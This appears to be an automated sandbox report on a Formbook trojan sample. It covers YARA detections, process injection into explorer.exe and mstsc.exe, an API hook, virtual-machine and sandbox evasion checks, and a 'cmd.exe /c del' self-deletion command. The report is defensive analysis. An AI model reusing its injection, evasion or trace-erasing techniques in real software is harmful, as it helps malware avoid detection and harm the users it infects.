          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.3048431353.0000000034AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.7444154369.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SC.028UCCP.exe PID: 2704, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00404822
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_004062C3
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00406A9A
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ECD480
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60445
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F175C6
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1F5C9
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2A526
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED36EC
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5C6E0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1F6F6
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1A6C0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60680
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E84670
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0D646
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFD62C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7C600
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E62760
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6A760
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F16757
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F170F1
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6B0D0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E500A0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E9508C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0E076
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B1E0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E651C0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EA717A
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFD130
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4F113
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2010E
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E4D2EC
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E22245
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1124C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E51380
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1F330
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6E310
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7FCE0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F2ACEB
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E78CDF
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EF9C98
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E63C60
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1EC60
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F16C69
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0EC4C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6AC20
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E50C12
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EFFDF4
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E69DD0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E72DB0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E60D69
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F17D4C
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1FD27
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5AD00
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E52EE8
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F19ED2
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E61EB2
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F10EAD
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F00E6D
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EA2E48
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E80E50
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E66FE0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F11FC6
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1EFBF
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1FF63
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E6CF00
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F178F3
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E628C0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F118DA
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34ED98B2
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E76882
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1F872
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E46868
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E69870
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7B870
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F00835
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E63800
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E810
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E299E8
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34EA59C0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E5E9A0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1E9A6
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E7FAA0
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F1FA89
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: String function: 34E4B910 appears 245 times
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: String function: 34EDEF10 appears 102 times
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: String function: 34ECE692 appears 81 times
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: String function: 34EA7BE4 appears 78 times
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92CF0 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92C50 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92C30 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92DA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92D10 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92ED0 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92EB0 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92E50 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92F00 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E929F0 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92A80 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92BC0 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92B90 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92B10 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E934E0 NtCreateMutant,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E94570 NtSuspendThread,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E94260 NtSetContextThread,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92CD0 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E93C90 NtOpenThread,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92C20 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E93C30 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92C10 NtOpenProcess,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92D50 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92EC0 NtQuerySection,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92E80 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92E00 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92FB0 NtSetValueKey,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92F30 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E938D0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E929D0 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92AC0 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E92AA0 NtQueryInformationFile,
          Source: SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000003.2966799157.000000003529C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000002.3051285400.00000000350F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034DD2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034BEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034DA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
          Source: SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: edgegdi.dll
          Source: SC.028UCCP.exeStatic PE information: invalid certificate
          Source: SC.028UCCP.exeVirustotal: Detection: 50%
          Source: SC.028UCCP.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile read: C:\Users\user\Desktop\SC.028UCCP.exeJump to behavior
          Source: SC.028UCCP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SC.028UCCP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"
          Source: C:\Users\user\Desktop\SC.028UCCP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\Documents\Snarer.iniJump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\AppData\Local\Temp\nsl7C13.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@24/16
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:304:WilStaging_02
          Source: Binary string: mshtml.pdb source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC.028UCCP.exe, SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
          Source: Binary string: mstsc.pdb source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.2936860727.000000000411D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2936860727.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, type: DROPPED
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_10002CE0 push eax; ret
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E297A1 push es; iretd
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E221AD pushad ; retf 0004h
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E508CD push ecx; mov dword ptr [esp], ecx
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile created: C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE9
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\SC.028UCCP.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\explorer.exe TID: 3016Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3100Thread sleep count: 126 > 30
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3100Thread sleep time: -252000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 rdtsc
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 863
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881
          Source: C:\Users\user\Desktop\SC.028UCCP.exeAPI coverage: 1.1 %
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_0040264F FindFirstFileA,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\SC.028UCCP.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SC.028UCCP.exeAPI call chain: ExitProcess graph end node
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E91763 rdtsc
          Source: C:\Users\user\Desktop\SC.028UCCP.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E4EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E8E4EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34E854E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC.028UCCP.exeCode function: 6_2_34F0F4FD mov eax, dword ptr fs:[00000030h]
